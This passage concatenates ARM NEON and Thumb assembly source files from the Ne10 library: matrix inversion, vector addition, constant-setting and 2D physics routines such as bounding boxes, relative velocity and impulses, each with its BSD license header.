@ arm_result_t ne10_invmat_4x4f(arm_mat4x4f_t * dst,
@ arm_mat4x4f_t * src1,
@ arm_mat4x4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
vpush {q4, q5, q6, q7}
adr r4, CONST_FLOAT_1Em12
adr r5, CONST_FLOAT_ONE
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat4x4
@ We load two 4x4 matrices each time, inverse them using the
@ provided macro above, and store the two resulting matrices
@ back into the memory location pointed to by the first parameter dst (r0)
@ load the 1st set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, q0, q1, q2, q3, q4, q5, q6, q7, r1
subs r2, r2, #2 @ two for the first set
@ calculate values for the 1st set
GET_INVERSE_4x4MATS
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the 1st/next (e.g. 3rd) set
STORE_4x4INVMATS
@ load the next (e.g. 3rd) set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, q0, q1, q2, q3, q4, q5, q6, q7, r1
subs r2, r2, #2
@ calculate values for the 2nd/next (e.g. 3rd) set
GET_INVERSE_4x4MATS
bgt .L_mainloop_mat4x4 @ loop if r2 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the last set
STORE_4x4INVMATS
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array
vld4.32 { d0, d2, d4, d6 }, [r1]!
vld4.32 { d1, d3, d5, d7 }, [r1]!
vtrn.32 q0, q4
vtrn.32 q1, q5
vtrn.32 q2, q6
vtrn.32 q3, q7
subs r3, r3, #1
@ calculate values
GET_INVERSE_4x4MATS
@ store the results
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return
vpop {q4, q5, q6, q7}
pop {r4, r5}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 12,872 | modules/math/NE10_add.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_add.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_add_float_neon
.thumb
.thumb_func
ne10_add_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_float
.L_residualloop_float:
@ process the residual items in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[0]
subs r4, r4, #1
@ values
vadd.f32 d0, d0, d1
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_float
.L_check_mainloop_float:
cbz r3, .L_return_float
@ load the current set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]! @ for current set
.L_mainloop_float:
@ calculate values for current set
vadd.f32 q3, q0, q1 @ q3 = q0 + q1
@ store the result for current set
vst1.32 {d6,d7}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_return_float:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_add_vec2f_neon
.thumb
.thumb_func
ne10_add_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_float(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items in the input array
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
@ calculate values
vadd.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r3, .L_return_vec2
@ load the current set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
.L_mainloop_vec2:
@ calculate values for current set
vadd.f32 q8, q0, q2
vadd.f32 q9, q1, q3
@ store the result for current set
vst2.32 {d16,d17,d18,d19}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_return_vec2:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_add_vec3f_neon
.thumb
.thumb_func
ne10_add_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_float(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for
vadd.f32 d0, d0, d1
vadd.f32 d2, d2, d3
vadd.f32 d4, d4, d5
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
@ load current set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
.L_mainloop_vec3:
@ calculate values for current set
vadd.f32 q12, q0, q9
vadd.f32 q13, q1, q10
vadd.f32 q14, q2, q11
@ store the result for current set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_return_vec3:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_add_vec4f_neon
.thumb
.thumb_func
ne10_add_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_float(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the last few items left in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
vadd.f32 q0, q0, q1
vst1.32 {d0, d1}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r3, .L_return_vec4
@ load the current set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
.L_mainloop_vec4:
@ calculate values for the current set
vadd.f32 q12, q0, q8
vadd.f32 q13, q1, q9
vadd.f32 q14, q2, q10
vadd.f32 q15, q3, q11
@ store the result for the current set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_return_vec4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 6,327 | modules/math/NE10_setc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_setc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_setc_float_asm
.thumb
.thumb_func
ne10_setc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_setc_float(arm_float_t * dst,
@ const arm_float_t cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: cst
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndFloat
.LoopBeginFloat:
str r1, [r0], #4 @ Store it back into the main memory
subs r2, r2, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_setc_vec2f_asm
.thumb
.thumb_func
ne10_setc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_setc_vec2f(arm_vec2f_t * dst,
@ const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *cst
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
cbz r2, .LoopEndVec2F
ldr r4, [r1, #0] @ Load cst->x into r4
ldr r5, [r1, #4] @ Load cst->y into r5
.LoopBeginVec2F:
str r4, [r0], #4 @ Store them in the destination
str r5, [r0], #4
subs r2, r2, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5}
bx lr
.balign 4
.global ne10_setc_vec3f_asm
.thumb
.thumb_func
ne10_setc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_setc_vec3f(arm_vec3f_t * dst,
@ const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *cst
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6}
cbz r2, .LoopEndVec3F
ldr r4, [r1, #0] @ Load cst->x into r4
ldr r5, [r1, #4] @ Load cst->y into r5
ldr r6, [r1, #8] @ r6 = cst->z
.LoopBeginVec3F:
str r4, [r0], #4 @ Store them in the destination
str r5, [r0], #4
str r6, [r0], #4
subs r2, r2, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6}
bx lr
.balign 4
.global ne10_setc_vec4f_asm
.thumb
.thumb_func
ne10_setc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_setc_vec4f(arm_vec4f_t * dst,
@ const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *cst
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r2, .LoopEndVec4F
ldr r4, [r1, #0] @ Load cst->x into r4
ldr r5, [r1, #4] @ Load cst->y into r5
ldr r6, [r1, #8] @ r6 = cst->z
ldr r7, [r1, #12] @ r7 = cst->w
.LoopBeginVec4F:
str r4, [r0], #4 @ Store them in the destination
str r5, [r0], #4
str r6, [r0], #4
str r7, [r0], #4
subs r2, r2, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 1,612 | modules/math/NE10_mulcmatvec.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulcmatvec.asm.s
@
|
open-vela/external_Ne10 | 11,662 | modules/physics/NE10_physics.neon.s | /*
* Copyright 2014-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : physics/NE10_physics.neon.s
*/
#ifdef ENABLE_NE10_PHYSICS_COMPUTE_AABB_VEC2F_NEON
.text
.syntax unified
.align 4
.global ne10_physics_compute_aabb_vertex4_vec2f_neon
.thumb
.thumb_func
ne10_physics_compute_aabb_vertex4_vec2f_neon:
/**
*@
*@ Compute the AABB for a polygon where the vertex_count is a multiple of 4.
*@ To improve performance, four vertices are processed in one loop.
*@ When vertex_count < 4*n, the lacking of vertices should be filled with 0.
*@
*@ void ne10_physics_compute_aabb_vertex4_vec2f_neon(ne10_mat2x2f_t *aabb,
*@ ne10_vec2f_t *vertices,
*@ ne10_mat2x2f_t *xf,
*@ ne10_vec2f_t *radius,
*@ ne10_uint32_t vertex_count);
*@
*@ r0: *aabb, return axis aligned box
*@ r1: *vertices, a convex polygon
*@ r2: *xf, the position and orientation of rigid
*@ r3: *radius, the aligned bounding
*@ sp: vertex_count, vertices count of convex ploygen
*/
push {r4, r5}
ldr r4, [sp, #8] @ r4 = vertex_count
vld1.f32 {d30}, [r3] @load radius to d30
vld1.f32 {d4, d5}, [r2] @load xf to d4,d5
vdup.f32 q0, d4[0]
vdup.f32 q1, d4[1]
@vertices[0~3]
vld2.f32 {q4, q5}, [r1]! @load vertices
vmla.f32 q0, q4, d5[1]
vmul.f32 q6, q5, d5[1]
vmla.f32 q1, q4, d5[0]
vmul.f32 q7, q5, d5[0]
vsub.f32 q7, q0, q7
vadd.f32 q6, q1, q6
vswp.f32 d12, d15
subs r4, r4, #4
vmin.f32 q8, q7, q6
vpmin.f32 d24, d16, d17
vmax.f32 q9, q7, q6
vpmax.f32 d25, d18, d19
ble aabb_store_result
aabb_main_loop:
@vertices
vld2.f32 {q4, q5}, [r1]! @load vertices
vdup.f32 q0, d4[0]
vdup.f32 q1, d4[1]
vmla.f32 q0, q4, d5[1]
vmul.f32 q6, q5, d5[1]
vmla.f32 q1, q4, d5[0]
vmul.f32 q7, q5, d5[0]
vsub.f32 q7, q0, q7
vadd.f32 q6, q1, q6
vswp.f32 d12, d15
vmin.f32 q8, q7, q6
vpmin.f32 d26, d16, d17
vmax.f32 q9, q7, q6
vpmax.f32 d27, d18, d19
subs r4, r4, #4
vmin.f32 d24, d24, d26
vmax.f32 d25, d25, d27
bgt aabb_main_loop
aabb_store_result:
vsub.f32 d24, d24, d30
vadd.f32 d25, d25, d30
vst1.f32 {d24, d25}, [r0]
aabb_end:
@ return
pop {r4, r5}
bx lr
#endif // ENABLE_NE10_PHYSICS_COMPUTE_AABB_VEC2F_NEON
#ifdef ENABLE_NE10_PHYSICS_RELATIVE_V_VEC2F_NEON
.align 4
.global ne10_physics_relative_v_vec2f_neon
.thumb
.thumb_func
ne10_physics_relative_v_vec2f_neon:
/**
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*@
*@ calculate relative velocity at contact
*@
*@
*@ ne10_result_t ne10_physics_relative_v_vec2f_neon(ne10_vec2f_t *dv,
*@ ne10_vec3f_t *v_wa,
*@ ne10_vec2f_t *ra,
*@ ne10_vec3f_t *v_wb,
*@ ne10_vec2f_t *rb,
*@ ne10_uint32_t count)
*@
*@ r0: *dv, return relative velocity
*@ r1: *v_wa, velocity and angular velocity of body a
*@ r2: *ra, distance vector from center of mass of body a to contact point
*@ r3: *v_wb, velocity and angular velocity of body b
*@ sp: *rb, distance vector from center of mass of body b to contact point
*@ sp+4: count, the number of items
*@
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*/
push {r4, r5, r6, r7}
ldr r4, [sp, #16] @ r4 = *rb
ldr r5, [sp, #20] @ r5 = count
and r6, r5, #1 @ r6 = count&1
sub r5, r5, r6
cmp r5, #0
beq check_relative_v_left
relative_v_main_loop:
vld3.f32 {d0, d1, d2}, [r1]! @load v_wa [va->x, va->y, wa]
vld3.f32 {d4, d5, d6}, [r3]! @load v_wb [vb->x, vb->y, wb]
vld2.f32 {d7, d8}, [r2]! @load ra
vld2.f32 {d9, d10}, [r4]! @load rb
vmls.f32 d0, d2, d8
vmla.f32 d1, d2, d7
vmls.f32 d4, d6, d10
vmla.f32 d5, d6, d9
subs r5, r5, #2
vsub.f32 q10, q2, q0
vst2.f32 {d20, d21}, [r0]!
bgt relative_v_main_loop
check_relative_v_left:
cmp r6, #0
beq relative_v_end
relative_v_left:
vld3.f32 {d0[0], d1[0], d2[0]}, [r1]! @load v_wa [va->x, va->y, wa]
vld3.f32 {d4[0], d5[0], d6[0]}, [r3]! @load v_wb [vb->x, vb->y, wb]
vld1.f32 {d7}, [r2]! @load ra
vld1.f32 {d8}, [r4]! @load rb
vmls.f32 d0, d2, d7[1]
vmla.f32 d1, d2, d7[0]
vmls.f32 d4, d6, d8[1]
vmla.f32 d5, d6, d8[0]
vsub.f32 q10, q2, q0
vst2.f32 {d20[0], d21[0]}, [r0]!
relative_v_end:
@ return
pop {r4, r5, r6, r7}
bx lr
#endif // ENABLE_NE10_PHYSICS_RELATIVE_V_VEC2F_NEON
#ifdef ENABLE_NE10_PHYSICS_APPLY_IMPULSE_VEC2F_NEON
.align 4
.global ne10_physics_apply_impulse_vec2f_neon
.thumb
.thumb_func
ne10_physics_apply_impulse_vec2f_neon:
/**
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*@
*@ apply contact impulse
*@
*@ ne10_result_t ne10_physics_apply_impulse_vec2f_neon(ne10_vec3f_t *v_wa,
*@ ne10_vec3f_t *v_wb,
*@ ne10_vec2f_t *ra,
*@ ne10_vec2f_t *rb,
*@ ne10_vec2f_t *ima,
*@ ne10_vec2f_t *imb,
*@ ne10_vec2f_t *p,
*@ ne10_uint32_t count)
*@
*@ r0: *v_wa, return velocity and angular velocity of body a
*@ r1: *v_wb, return velocity and angular velocity of body b
*@ r2: *ra, distance vector from center of mass of body a to contact point
*@ r3: *rb, distance vector from center of mass of body b to contact point
*@ sp: *ima, constant of body a
*@ sp+4: *imb, constant of body b
*@ sp+8: *p, constant
*@ sp+12: count, the number of items
*@
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
**/
push {r4, r5, r6, r7}
ldr r4, [sp, #16] @ r4 = *ima
ldr r5, [sp, #20] @ r5 = *imb
ldr r6, [sp, #24] @ r6 = *p
ldr r7, [sp, #28] @ r7 = count
@push {r8}
and r12, r7, #1 @ r12 = count&1
sub r7, r7, r12
cmp r7, #0
beq check_apply_impulse_left
apply_impulse_main_loop:
vld2.f32 {d0, d1}, [r2]! @load ra
vld2.f32 {d2, d3}, [r3]! @load rb
vld2.f32 {d20, d21}, [r4]! @load ima
vld2.f32 {d22, d23}, [r5]! @load imb
vld2.f32 {d6, d7}, [r6]! @load p
vld3.f32 {d8, d9, d10}, [r0] @load v_wa
vld3.f32 {d12, d13, d14}, [r1] @load v_wb
vmls.f32 d8, d6, d20
vmls.f32 d9, d7, d20
vmul.f32 d16, d0, d7
vmls.f32 d16, d1, d6
vmls.f32 d10, d16, d21
vmla.f32 d12, d6, d22
vmla.f32 d13, d7, d22
vmul.f32 d16, d2, d7
vmls.f32 d16, d3, d6
vmla.f32 d14, d16, d23
subs r7, r7, #2
vst3.f32 {d8, d9, d10}, [r0]!
vst3.f32 {d12, d13, d14}, [r1]!
bgt apply_impulse_main_loop
check_apply_impulse_left:
cmp r12, #0
beq apply_impulse_end
apply_impulse_left:
vld2.f32 {d0[0], d1[0]}, [r2]! @load ra
vld2.f32 {d2[0], d3[0]}, [r3]! @load rb
